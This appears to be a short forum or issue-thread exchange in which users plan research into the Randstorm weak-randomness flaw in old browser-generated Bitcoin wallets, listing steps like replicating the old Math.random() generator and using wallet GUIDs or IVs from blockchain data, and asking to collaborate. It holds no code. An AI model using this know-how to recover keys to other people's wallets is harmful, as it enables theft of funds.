randomchoice2
commented
8 months ago I see we have to implement and do much more deeper research. Here are potential issues:
- Replicate old Math.random() itself (mwc1616)
- Somehow using blockchain data to recover valuable info (I'm still lacking on that, I mean Unciphered mentioned GUID or IV kind of thing that I'm still not understanding)
- Optimisation
Also I found some old website copies from various sources that used that library in different ways like more secure or much more weaker. One of them is just using Math.random() itself. Will write on that later
Hi, I was also started researching Randstorm vulnerability. As we can read from unciphered, they said that they were able to make it feasible by wallet's GUID or IV ([link](https://www.unciphered.com/blog/randstorm-you-cant-patch-a-house-of-cards#:~:text=Typically%2C%20in%20order%20for%20this%20attack%20to%20be%20feasible%2C%20an%20attacker%20would%20need%20something%20which%20was%20generated%20from%20Math.random()%20at%20the%20time%20of%20wallet%20generation%20%2D%20this%20would%20typically%20be%20the%20wallet%20GUID%20or%20IV.%20This%20reduces%20the%20amount%20of%20necessary%20work%20anywhere%20from%2032%20to%2064%2Dbits.))
I also wanna do that research with you, can we collab on that? I'm also so much interested in it